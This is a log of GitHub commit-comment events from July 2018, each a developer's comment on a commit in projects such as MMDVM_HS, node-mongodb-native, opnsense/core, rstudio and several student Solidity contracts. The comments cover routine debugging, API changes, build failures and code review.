{"id":"7977648787","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29737169,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-17T15:52:27Z","updated_at":"2018-07-17T15:52:27Z","author_association":"NONE","body":"Unfortunately I don't have any MMDVM repeater near me to try... curiously I don't have any issue with my hotspot on DMR or YSF, and average RSSI value is actually higher on these modes than on DStar, even if I'm similarly far from the hotspot and with similar power, etc... the AFC was just an idea to test as I really don't know what to try more...\r\n\r\nI don't understand what happens on DStar but it apparently happens to me and to a few of my friends with similar MMDVM_HS, from time to time our transmissions are cut at middle and only continue after we release ptt and start transmitting again... very annoying... actually I think there may be two issues around, one eventually with DStar requiring very strong signal to be \"perfect\" (unlike other modes) and possibly other issue with either mmdvmhost/ircddbgateway not being able to handle the errors/interruption... concerning the 2nd one I did even try to look at ircddbgateway source and thought about trying to increase the radio watchdog timer from the default 2 seconds to something higher... but not sure about disadvantages and I think that will not help, as I guess it will then still trigger network watchdog timer on other's listening at me, I think... unsure what to try really..."}},"created_at":"2018-07-17T15:52:27Z"}
{"id":"7977650456","type":"CommitCommentEvent","actor":{"login":"Freyja-Folkvangr"},"repo":{"name":"entel-garage/node-red-bluemix-starter-1"},"payload":{"comment":{"id":29737173,"position":null,"line":null,"path":null,"commit_id":"177703557ac8e8180c780c913c550eddd15a0b70","created_at":"2018-07-17T15:52:44Z","updated_at":"2018-07-17T15:52:44Z","author_association":"MEMBER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/50a571c6-a3ad-4e2d-bb01-07256d1803b1?env_id=ibm%3Ayp%3Aus-south \"observatorio\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/e6226823-269c-48e4-be2a-79dfc959087e?env_id=ibm%3Ayp%3Aus-south \"observatorio\") deployed [node-red-bluemix-starter-1](https://github.com/entel-garage/node-red-bluemix-starter-1/releases/tag/deploy-ibm-yp-us-south-ENTEL-Corp-observatorio-20180717-155243 \"deploy-ibm-yp-us-south-ENTEL-Corp-observatorio-20180717-155243\") to [observatorio](https://console.bluemix.net/apps/39c52541-7064-4528-ac09-f6c777e5920a?env_id=ibm:yp:us-south \"ibm:yp:us-south:ENTEL Corp:observatorio\"), including this commit"}},"created_at":"2018-07-17T15:52:44Z"}
{"id":"7977653663","type":"CommitCommentEvent","actor":{"login":"gamalielhere"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29737179,"position":null,"line":null,"path":null,"commit_id":"18d867c62f0ad7e4847ebb9cbd9f18f05b922c3c","created_at":"2018-07-17T15:53:16Z","updated_at":"2018-07-17T15:53:16Z","author_association":"CONTRIBUTOR","body":"@kvhnuke @hsurf22 Seems like all the changes here are unnecessary since all these are already setup on develop. Closing this branch.\r\n\r\n@hsurf22 build your new features from the develop branch."}},"created_at":"2018-07-17T15:53:16Z"}
{"id":"7977655108","type":"CommitCommentEvent","actor":{"login":"mbroadst"},"repo":{"name":"mongodb/node-mongodb-native"},"payload":{"comment":{"id":29737184,"position":null,"line":null,"path":null,"commit_id":"b7ae8cd70c90d3c14d22708869335b31c39b148f","created_at":"2018-07-17T15:53:31Z","updated_at":"2018-07-17T15:53:31Z","author_association":"MEMBER","body":"Hi @NatalieWolfe, the instrumentation (APM) API in 2.x of the driver did not follow our driver specification for command monitoring, so it was replaced with a more robust implementation in 3.x. APM is now accomplished by setting the [monitorCommand](https://github.com/mongodb/node-mongodb-native/blob/master/lib/mongo_client.js#L110) option, and then listening to the `commandStarted`, `commandSucceeded`, and `commandFailed` on a `MongoClient` instance. Also, the `instrument` API still works as before, with a shim [Instrumentation](https://github.com/mongodb/node-mongodb-native/blob/master/lib/apm.js#L4) class still provided, however you cannot \"uninstrument\" as you once could.\r\n\r\nAlso, please open a JIRA for questions in the future. We would like to capture these types of conversations for the benefit of other users.  "}},"created_at":"2018-07-17T15:53:31Z"}
{"id":"7977659149","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29737194,"position":null,"line":null,"path":null,"commit_id":"7e6172ebfc7af8ace32b5c0d24517d981d8f7df2","created_at":"2018-07-17T15:54:12Z","updated_at":"2018-07-17T15:54:12Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-392](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-392).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-392-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T15:54:12Z"}
{"id":"7977659290","type":"CommitCommentEvent","actor":{"login":"dholth"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29737195,"position":null,"line":null,"path":null,"commit_id":"50e11a0c10ad33eea4e887ea0c1fb6133f0a74d8","created_at":"2018-07-17T15:54:12Z","updated_at":"2018-07-17T15:54:12Z","author_association":"MEMBER","body":"An ordered set may yield an elegant solution\n\n\nOn Tue, Jul 17, 2018, at 9:48 AM, Alex Grönholm wrote:\n> Nvm, it's in wheel/metadata.py. I'll fix this real soon.\n\n\n> — You are receiving this because you commented. Reply to this email\n> directly, view it on GitHub[1], or mute the thread[2].\nLinks:\n\n  1. https://github.com/pypa/wheel/commit/50e11a0c10ad33eea4e887ea0c1fb6133f0a74d8#commitcomment-29735004\n  2. https://github.com/notifications/unsubscribe-auth/AAMsksdggCf3s3nrq9T0yV1_Xi4NNq72ks5uHescgaJpZM4VS0Ni\n"}},"created_at":"2018-07-17T15:54:12Z"}
{"id":"7977661211","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29737198,"position":null,"line":null,"path":null,"commit_id":"8b1d59057d368e46c030e8713cadccd7cf711977","created_at":"2018-07-17T15:54:32Z","updated_at":"2018-07-17T15:54:32Z","author_association":"OWNER","body":"I don't think there is any chance that the libbinder ABI would change again. Comments in libbinder source suggested that ashmem tracking would be removed in the future. Since this shim solved that case, I think we can forget about patching libbinder."}},"created_at":"2018-07-17T15:54:32Z"}
{"id":"7977663450","type":"CommitCommentEvent","actor":{"login":"ComputerTime"},"repo":{"name":"aframevr/aframe"},"payload":{"comment":{"id":29737202,"position":null,"line":null,"path":null,"commit_id":"8809e7fd5eccd4c4ce76892f4a5673b911dfd60f","created_at":"2018-07-17T15:54:55Z","updated_at":"2018-07-17T15:54:55Z","author_association":"NONE","body":"Not sure if this is the reason why but entities within groups (nested in an entity) stopped making it into the raycaster's objects array between this and the 0.8.2 release"}},"created_at":"2018-07-17T15:54:55Z"}
{"id":"7977666634","type":"CommitCommentEvent","actor":{"login":"FloRockera"},"repo":{"name":"gaetanfavrau/tableauxBouclesConditions"},"payload":{"comment":{"id":29737206,"position":null,"line":null,"path":null,"commit_id":"4bf9d64be28e1129e7b807fec3aa29a9a41bd1e7","created_at":"2018-07-17T15:55:26Z","updated_at":"2018-07-17T15:55:26Z","author_association":"NONE","body":"Petite correction \r\n\r\n\t\tScanner scan = new Scanner(System.in);\t\r\n\t\tSystem.out.println(\"Veuillez saisir un nombre : \");\r\n\t\tint nb =scan.nextInt();\r\n\t\tint sum=0;\r\n\t\tfor (int i = 0; i <=nb; i++) {\r\n\t\t\tsum+=i;\t\r\n\t\t}\r\n\t\tSystem.out.println(sum);\r\n\t\tscan.close();"}},"created_at":"2018-07-17T15:55:26Z"}
{"id":"7977672107","type":"CommitCommentEvent","actor":{"login":"cashlalala"},"repo":{"name":"jenkinsci/parameterized-remote-trigger-plugin"},"payload":{"comment":{"id":29737221,"position":null,"line":null,"path":null,"commit_id":"ffab7282197147fd3cd5f9fc32410fdc6f0a4878","created_at":"2018-07-17T15:56:18Z","updated_at":"2018-07-17T15:56:18Z","author_association":"NONE","body":"@alejandraferreirovidal , this is a lot of code change & fix a major bug of http post. Just a kindly remind for you since your company & you had many activities on this plugin. "}},"created_at":"2018-07-17T15:56:18Z"}
{"id":"7977678119","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29737233,"position":null,"line":null,"path":null,"commit_id":"2f924ebe3f8b6e32f2185bb3b8b585ae18980ab8","created_at":"2018-07-17T15:57:18Z","updated_at":"2018-07-17T15:57:18Z","author_association":"CONTRIBUTOR","body":"네. rake delete 코드를 리뷰해 보겠습니다."}},"created_at":"2018-07-17T15:57:18Z"}
{"id":"7977680855","type":"CommitCommentEvent","actor":{"login":"mingwandroid"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":29737236,"position":null,"line":null,"path":null,"commit_id":"d026ae8b360f993726a27c33ccf9c05be8cf70d2","created_at":"2018-07-17T15:57:43Z","updated_at":"2018-07-17T15:57:43Z","author_association":"NONE","body":"This prevents running on macOS < 10.12, is that the minimum target for RStudio?"}},"created_at":"2018-07-17T15:57:43Z"}
{"id":"7977681257","type":"CommitCommentEvent","actor":{"login":"zstadler"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":29737237,"position":null,"line":null,"path":null,"commit_id":"f04d9e20b5d57b93c77acf8a962313694210259b","created_at":"2018-07-17T15:57:47Z","updated_at":"2018-07-17T15:57:47Z","author_association":"CONTRIBUTOR","body":"Fixed in e771e8e24f1c90359f074629f7e3f82eb6c48be3\r\nThanks!"}},"created_at":"2018-07-17T15:57:47Z"}
{"id":"7977682365","type":"CommitCommentEvent","actor":{"login":"roytam1"},"repo":{"name":"roytam1/palemoon26"},"payload":{"comment":{"id":29737238,"position":4,"line":84,"path":"media/libcubeb/src/cubeb_winmm.c","commit_id":"34fc78cf0256df178d86dfdae26d38dc66ef46c8","created_at":"2018-07-17T15:57:58Z","updated_at":"2018-07-17T15:57:58Z","author_association":"OWNER","body":"Memo: libraries doesn't like this SList implementation."}},"created_at":"2018-07-17T15:57:58Z"}
{"id":"7977685611","type":"CommitCommentEvent","actor":{"login":"PeterAltamirano"},"repo":{"name":"Jam3/AR.js"},"payload":{"comment":{"id":29737241,"position":null,"line":null,"path":null,"commit_id":"25dbcc93ef1e5707ff20a3c445f204418790f915","created_at":"2018-07-17T15:58:30Z","updated_at":"2018-07-17T15:58:30Z","author_association":"NONE","body":"Thanks @DonghyukJacobJang . Sounds good and yea definitely let's consider this as an official PR, might be element reference (HTML element) or elementID (string)."}},"created_at":"2018-07-17T15:58:30Z"}
{"id":"7977689325","type":"CommitCommentEvent","actor":{"login":"mscuthbert"},"repo":{"name":"dvdrndlph/music21"},"payload":{"comment":{"id":29737250,"position":41,"line":614,"path":"music21/abcFormat/testFiles.py","commit_id":"8494e67ccf69cb76342b4bb5fd16deea1761210e","created_at":"2018-07-17T15:59:07Z","updated_at":"2018-07-17T15:59:07Z","author_association":"NONE","body":"Can you change this line to `self.assertEquals(sharps, 7, \"C# key signature should be parsed as 7 sharps\")` -- we don't use bare asserts since they are not caught by the testing mechanism.  Looks good otherwise!"}},"created_at":"2018-07-17T15:59:07Z"}
{"id":"7977690049","type":"CommitCommentEvent","actor":{"login":"TheLordOfAllMuffins"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29737252,"position":14,"line":33,"path":"src/Projectile.java","commit_id":"b25b417191e17d83a2f4dc3b6f29c0553e00af2a","created_at":"2018-07-17T15:59:15Z","updated_at":"2018-07-17T15:59:15Z","author_association":"CONTRIBUTOR","body":"cool\r\n"}},"created_at":"2018-07-17T15:59:15Z"}
{"id":"7977690216","type":"CommitCommentEvent","actor":{"login":"Hj2207"},"repo":{"name":"prabhupant/Smart-Parking"},"payload":{"comment":{"id":29737253,"position":2,"line":2,"path":"formula.txt","commit_id":"6a23654c76b995def83309236bd2c035a36984cb","created_at":"2018-07-17T15:59:17Z","updated_at":"2018-07-17T15:59:17Z","author_association":"COLLABORATOR","body":"declare fare here"}},"created_at":"2018-07-17T15:59:17Z"}
{"id":"7977692523","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29737261,"position":7,"line":144,"path":"src/opnsense/mvc/app/library/OPNsense/Backup/Nextcloud.php","commit_id":"50fb5bcb0c8f1c97653acd282394bdadb4e9b9ce","created_at":"2018-07-17T15:59:38Z","updated_at":"2018-07-17T15:59:38Z","author_association":"MEMBER","body":"@fichtner this commit breaks it because now the semicolon is missing -> php syntax error\r\n\r\nafter adding it, it looks good:\r\n![screenshot_20180717_175904](https://user-images.githubusercontent.com/3713914/42830195-18e52a28-89eb-11e8-88b1-df5896f71b54.png)\r\n"}},"created_at":"2018-07-17T15:59:38Z"}
{"id":"7977693837","type":"CommitCommentEvent","actor":{"login":"hickford"},"repo":{"name":"NuGet/docs.microsoft.com-nuget"},"payload":{"comment":{"id":29737263,"position":null,"line":null,"path":null,"commit_id":"b4beed6d89c92492adf881589c41352730326321","created_at":"2018-07-17T15:59:52Z","updated_at":"2018-07-17T15:59:52Z","author_association":"CONTRIBUTOR","body":"It would be useful to specify what values DependencyVersion can take, and what they mean"}},"created_at":"2018-07-17T15:59:52Z"}
{"id":"7977693889","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29737262,"position":17,"line":17,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-17T15:59:52Z","updated_at":"2018-07-17T15:59:52Z","author_association":"NONE","body":"Great question!\r\n\r\nLoD is not a yes/no thing, it's shades. The more indirection you have, the worse it is.\r\n\r\nYou can create a method `Game::getCurrentSymbol()` if you want - I haven't thought about that. It might be a better design, never thought about that - so try it out!"}},"created_at":"2018-07-17T15:59:52Z"}
{"id":"7977693884","type":"CommitCommentEvent","actor":{"login":"juribeparada"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29737264,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-17T15:59:53Z","updated_at":"2018-07-17T15:59:53Z","author_association":"OWNER","body":"Honesty I haven't seen that problem during my common D-Star use, actually D-Star is the mode that works better in MMDVM_HS, better than DMR and far much better than YSF. Probably I don't speak so long and always use the hotspot at short distances. Can you describe how to reproduce that problem?, how long transmission or with what RSSI signal? "}},"created_at":"2018-07-17T15:59:53Z"}
{"id":"7977694858","type":"CommitCommentEvent","actor":{"login":"rockalves"},"repo":{"name":"rockalves/CursoJava"},"payload":{"comment":{"id":29737266,"position":null,"line":null,"path":null,"commit_id":"5380305f1f5bee97221b03c7fb6b5618e9e10058","created_at":"2018-07-17T16:00:02Z","updated_at":"2018-07-17T16:00:02Z","author_association":"OWNER","body":"Teste de comentário"}},"created_at":"2018-07-17T16:00:02Z"}
{"id":"7977695686","type":"CommitCommentEvent","actor":{"login":"rockalves"},"repo":{"name":"rockalves/CursoJava"},"payload":{"comment":{"id":29737269,"position":3,"line":13,"path":"CursoJava/src/Fundamentos/OperadoresRelacionais.java","commit_id":"5380305f1f5bee97221b03c7fb6b5618e9e10058","created_at":"2018-07-17T16:00:12Z","updated_at":"2018-07-17T16:00:12Z","author_association":"OWNER","body":"balbalabla\r\n"}},"created_at":"2018-07-17T16:00:12Z"}
{"id":"7977700843","type":"CommitCommentEvent","actor":{"login":"cgewecke"},"repo":{"name":"cgewecke/eth-gas-reporter"},"payload":{"comment":{"id":29737281,"position":null,"line":null,"path":null,"commit_id":"9073fe7ea0eb7a158de3edba4faee606e5ad33e4","created_at":"2018-07-17T16:00:59Z","updated_at":"2018-07-17T16:00:59Z","author_association":"OWNER","body":"@iamchrissmith Yes, I'm so sorry - I was actually going to look at this this afternoon. It turns out that something is slight awry - it was a little hard to see because the test output was getting mangled. But some methods aren't getting gas values collected in the example suite. \r\n\r\nIf you *want* to look at this please feel free - otherwise I will just debug the revert branch and re-open ASAP. I'm sure it's something small - everything looks great re: basic strategy for adding this additional granularity."}},"created_at":"2018-07-17T16:00:59Z"}
{"id":"7977708653","type":"CommitCommentEvent","actor":{"login":"dacase"},"repo":{"name":"Amber-MD/ParmEd"},"payload":{"comment":{"id":29737295,"position":null,"line":null,"path":null,"commit_id":"6a0dda96c42ef923e2b551c7a88cb6e1b85c9b14","created_at":"2018-07-17T16:02:17Z","updated_at":"2018-07-17T16:02:17Z","author_association":"NONE","body":"I'm having trouble finding out just *how* deprecated fromstring is.  Some sites seem to say that only the final argument is deprecated, but I can't tell if that is authentic or not.  See e.g.\r\n\r\n  https://docs.scipy.org/doc/numpy-1.14.0/reference/generated/numpy.fromstring.html\r\n\r\nI've seen several sites that have stumbled on the same problem we have: frombuffer is not a substitute for fromstring.  If parmed is just doing this to avoid a warning, maybe we are over-reacting.  Could we revert this change until we have time to figure out how to update codes (like XtalAnalyze) that depend on the older behavior?"}},"created_at":"2018-07-17T16:02:17Z"}
{"id":"7977710887","type":"CommitCommentEvent","actor":{"login":"allenjstewart"},"repo":{"name":"emilyg406/UG-Summer-Research-2018"},"payload":{"comment":{"id":29737300,"position":null,"line":null,"path":null,"commit_id":"1277fc0075f9f028803f76cea8309c0f39050e14","created_at":"2018-07-17T16:02:40Z","updated_at":"2018-07-17T16:02:40Z","author_association":"COLLABORATOR","body":"@emilyg406 for any matrix A, an eigenvector is a vector x such that Ax=(lambda)x. Here lambda is just some constant. If I subtract the lambda x from both sides I get Av-(lambda)v=0. Since lambda is just a constant (lambda)x=lambda*I*x where I is the identity matrix [[1,0],[0,1]]. So to solve the eigenvalue problem we need to solve (A-lambda*I)x=0 for x to find the eigenvector, x"}},"created_at":"2018-07-17T16:02:40Z"}
{"id":"7977712285","type":"CommitCommentEvent","actor":{"login":"Veridiano1976"},"repo":{"name":"Veridiano1976/AlunosAlgoritmos-2017.2"},"payload":{"comment":{"id":29737302,"position":null,"line":null,"path":null,"commit_id":"b2f87358ab2510fc26e3c2e9c999146457736029","created_at":"2018-07-17T16:02:55Z","updated_at":"2018-07-17T16:02:55Z","author_association":"OWNER","body":"## Veridiano Francisco -[Veridiano1976] (https://github.com/veridiano1976/)\r\n *[SistemaIdiomas] (https://github.com/Veridiano1976/SistemasIdiomas)"}},"created_at":"2018-07-17T16:02:55Z"}
{"id":"7977713943","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29737306,"position":73,"line":33,"path":"test/tests.js","commit_id":"b6f3d1d0858a9a509b0a69b3f9a399e4a8534c6d","created_at":"2018-07-17T16:03:12Z","updated_at":"2018-07-17T16:03:12Z","author_association":"NONE","body":"See how it is declared here https://github.com/b9lab/b9_faucet/blob/master/test/owned.js#L126 and used in the `it`. \r\nHere it is declared inside an `it` https://github.com/b9lab/b9_faucet/blob/master/test/throttledFaucet.js#L329"}},"created_at":"2018-07-17T16:03:12Z"}
{"id":"7977717807","type":"CommitCommentEvent","actor":{"login":"gtritchie"},"repo":{"name":"rstudio/rstudio"},"payload":{"comment":{"id":29737315,"position":null,"line":null,"path":null,"commit_id":"d026ae8b360f993726a27c33ccf9c05be8cf70d2","created_at":"2018-07-17T16:03:51Z","updated_at":"2018-07-17T16:03:51Z","author_association":"CONTRIBUTOR","body":"Yes, for RStudio 1.2 we've set 10.12 as the minimum macOS target. By the time we release 1.2, it will run on the 3 most recent in-market macOS's: (12, 13, 14)."}},"created_at":"2018-07-17T16:03:51Z"}
{"id":"7977718315","type":"CommitCommentEvent","actor":{"login":"Veridiano1976"},"repo":{"name":"Veridiano1976/AlunosAlgoritmos-2017.2"},"payload":{"comment":{"id":29737319,"position":30,"line":30,"path":"README.md","commit_id":"b2f87358ab2510fc26e3c2e9c999146457736029","created_at":"2018-07-17T16:03:56Z","updated_at":"2018-07-17T16:03:56Z","author_association":"OWNER","body":"## Veridiano Francisco -[Veridiano1976] (https://github.com/veridiano1976/)\r\n*[SistemaIdiomas] (https://github.com/Veridiano1976/SistemasIdiomas)"}},"created_at":"2018-07-17T16:03:56Z"}
{"id":"7977723806","type":"CommitCommentEvent","actor":{"login":"luketainton"},"repo":{"name":"HaCSBCU/hacsbcu.github.io"},"payload":{"comment":{"id":29737327,"position":null,"line":null,"path":null,"commit_id":"3b00651136aa44d58c4a8290a4cb579d21334593","created_at":"2018-07-17T16:04:54Z","updated_at":"2018-07-17T16:04:54Z","author_association":"MEMBER","body":"This is what I did earlier, and it broke some other dependencies."}},"created_at":"2018-07-17T16:04:54Z"}
{"id":"7977724276","type":"CommitCommentEvent","actor":{"login":"SP-Blanco"},"repo":{"name":"b-waves/Lazarus-pit2"},"payload":{"comment":{"id":29737329,"position":29,"line":13,"path":"firstDraft","commit_id":"9999b39851d010f39cbed86be42996365dc379a5","created_at":"2018-07-17T16:04:59Z","updated_at":"2018-07-17T16:04:59Z","author_association":"NONE","body":"Hey Ben Watch the damn videos!!!"}},"created_at":"2018-07-17T16:04:59Z"}
{"id":"7977725517","type":"CommitCommentEvent","actor":{"login":"AdSchellevis"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29737332,"position":7,"line":144,"path":"src/opnsense/mvc/app/library/OPNsense/Backup/Nextcloud.php","commit_id":"50fb5bcb0c8f1c97653acd282394bdadb4e9b9ce","created_at":"2018-07-17T16:05:12Z","updated_at":"2018-07-17T16:05:12Z","author_association":"MEMBER","body":"@fabianfrz thanks https://github.com/opnsense/core/commit/9bcbd8a30531f50ccb79442f92472e08f40aef96 should fix it"}},"created_at":"2018-07-17T16:05:12Z"}
{"id":"7977728849","type":"CommitCommentEvent","actor":{"login":"CoffeeOwl97"},"repo":{"name":"HaCSBCU/hacsbcu.github.io"},"payload":{"comment":{"id":29737336,"position":null,"line":null,"path":null,"commit_id":"3b00651136aa44d58c4a8290a4cb579d21334593","created_at":"2018-07-17T16:05:45Z","updated_at":"2018-07-17T16:05:45Z","author_association":"MEMBER","body":"What gets broken?\r\n"}},"created_at":"2018-07-17T16:05:45Z"}
{"id":"7977731277","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29737340,"position":46,"line":87,"path":"contracts/Remittance.sol","commit_id":"f4f2f3b5de8261cfe0b443f414c7e7b37055aae8","created_at":"2018-07-17T16:06:10Z","updated_at":"2018-07-17T16:06:10Z","author_association":"NONE","body":"If it is to link back to your external system, it need not be included in the hash but is an argument that only needs repeating in an event.\r\nI would tend to prevent reuse of an OTP because if it were allowed someone could collect all the previously used ones and try again in some combination."}},"created_at":"2018-07-17T16:06:10Z"}
{"id":"7977734384","type":"CommitCommentEvent","actor":{"login":"luketainton"},"repo":{"name":"HaCSBCU/hacsbcu.github.io"},"payload":{"comment":{"id":29737346,"position":null,"line":null,"path":null,"commit_id":"3b00651136aa44d58c4a8290a4cb579d21334593","created_at":"2018-07-17T16:06:43Z","updated_at":"2018-07-17T16:06:43Z","author_association":"MEMBER","body":"Nokogiri and html-proofer ends up breaking"}},"created_at":"2018-07-17T16:06:43Z"}
{"id":"7977738276","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29737356,"position":5,"line":8,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T16:07:24Z","updated_at":"2018-07-17T16:07:24Z","author_association":"NONE","body":"Something else then."}},"created_at":"2018-07-17T16:07:24Z"}
{"id":"7977744267","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29737371,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T16:08:24Z","updated_at":"2018-07-17T16:08:24Z","author_association":"NONE","body":"Can you find a better way that will not require Alice to know of a particular website or knowledge of a future client-side language?"}},"created_at":"2018-07-17T16:08:24Z"}
{"id":"7977752817","type":"CommitCommentEvent","actor":{"login":"OpenUAS"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":29737387,"position":null,"line":null,"path":null,"commit_id":"8dbff73844bbcbce7cc661daf011293a8f372a15","created_at":"2018-07-17T16:09:52Z","updated_at":"2018-07-17T16:09:52Z","author_association":"CONTRIBUTOR","body":"Thx again, quite useful!"}},"created_at":"2018-07-17T16:09:52Z"}
{"id":"7977755314","type":"CommitCommentEvent","actor":{"login":"allenjstewart"},"repo":{"name":"emilyg406/UG-Summer-Research-2018"},"payload":{"comment":{"id":29737392,"position":null,"line":null,"path":null,"commit_id":"01fa99b8d53ef966970af7e216a4719d69146ad1","created_at":"2018-07-17T16:10:18Z","updated_at":"2018-07-17T16:10:18Z","author_association":"COLLABORATOR","body":"@emilyg406 One great thing about spyder is the that there is an Ipython console that allows you to run a single line of code to try and debug. I would suggest going through line by line of the code. Define t0,y0,n,tfinal. Then define dt. Then create y,t, and append the values. If all of that works then that means lines 25-29 are good and there is something wrong in the loop. "}},"created_at":"2018-07-17T16:10:18Z"}
{"id":"7977755654","type":"CommitCommentEvent","actor":{"login":"HarelM"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":29737393,"position":null,"line":null,"path":null,"commit_id":"e771e8e24f1c90359f074629f7e3f82eb6c48be3","created_at":"2018-07-17T16:10:22Z","updated_at":"2018-07-17T16:10:22Z","author_association":"MEMBER","body":"Seems like the build failed - I think there's a \",\" missing at the end of the line above robot.txt. "}},"created_at":"2018-07-17T16:10:22Z"}
{"id":"7977756832","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29737395,"position":82,"line":64,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T16:10:34Z","updated_at":"2018-07-17T16:10:34Z","author_association":"NONE","body":"`Payment storage payment = payments[paymentID];` will not create a new storage location. `payment` will be a reference to a storage location. Nothing is being created, only a reference is named.\r\nAnd you want to say `storage` because if you said `Payment memory payment = payments[paymentID];` then you would make a full copy, which is probably overkill if you only need to read a few of the fields."}},"created_at":"2018-07-17T16:10:34Z"}
{"id":"7977758668","type":"CommitCommentEvent","actor":{"login":"allenjstewart"},"repo":{"name":"emilyg406/UG-Summer-Research-2018"},"payload":{"comment":{"id":29737396,"position":null,"line":null,"path":null,"commit_id":"01fa99b8d53ef966970af7e216a4719d69146ad1","created_at":"2018-07-17T16:10:54Z","updated_at":"2018-07-17T16:10:54Z","author_association":"COLLABORATOR","body":"@emilyg406 Once you find exactly where the error is occuring, I would google the error message and see what people say about it."}},"created_at":"2018-07-17T16:10:54Z"}
{"id":"7977761719","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29737402,"position":null,"line":null,"path":null,"commit_id":"57cd0c995a64e0147c678c19cbdded62d6e9a960","created_at":"2018-07-17T16:11:27Z","updated_at":"2018-07-17T16:11:27Z","author_association":"NONE","body":"table-refactor (nealkruis) - i386-Windows-7-VisualStudio-14: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57cd0c995a64e0147c678c19cbdded62d6e9a960-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T16:11:27Z"}
{"id":"7977763142","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29737404,"position":null,"line":null,"path":null,"commit_id":"346b7c603ad79bd15bf0e6ea8215f5efab90b638","created_at":"2018-07-17T16:11:42Z","updated_at":"2018-07-17T16:11:42Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-221](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-221).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-221-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T16:11:42Z"}
{"id":"7977765227","type":"CommitCommentEvent","actor":{"login":"dwang"},"repo":{"name":"lightwave-lab/klayout"},"payload":{"comment":{"id":29737406,"position":null,"line":null,"path":null,"commit_id":"771eb8410749d17f7cde63bc39751df7d382de3d","created_at":"2018-07-17T16:12:05Z","updated_at":"2018-07-17T16:12:05Z","author_association":"MEMBER","body":"Builds will fail with Xcode 8 because `clock_gettime()` is not implemented in macOS 10.11.\r\nA workaround can be seen here [https://gist.github.com/jbenet/1087739](url)."}},"created_at":"2018-07-17T16:12:05Z"}
{"id":"7977765795","type":"CommitCommentEvent","actor":{"login":"fabianfrz"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29737408,"position":7,"line":144,"path":"src/opnsense/mvc/app/library/OPNsense/Backup/Nextcloud.php","commit_id":"50fb5bcb0c8f1c97653acd282394bdadb4e9b9ce","created_at":"2018-07-17T16:12:11Z","updated_at":"2018-07-17T16:12:11Z","author_association":"MEMBER","body":"@AdSchellevis except for the typo in the commit message: :+1: "}},"created_at":"2018-07-17T16:12:11Z"}
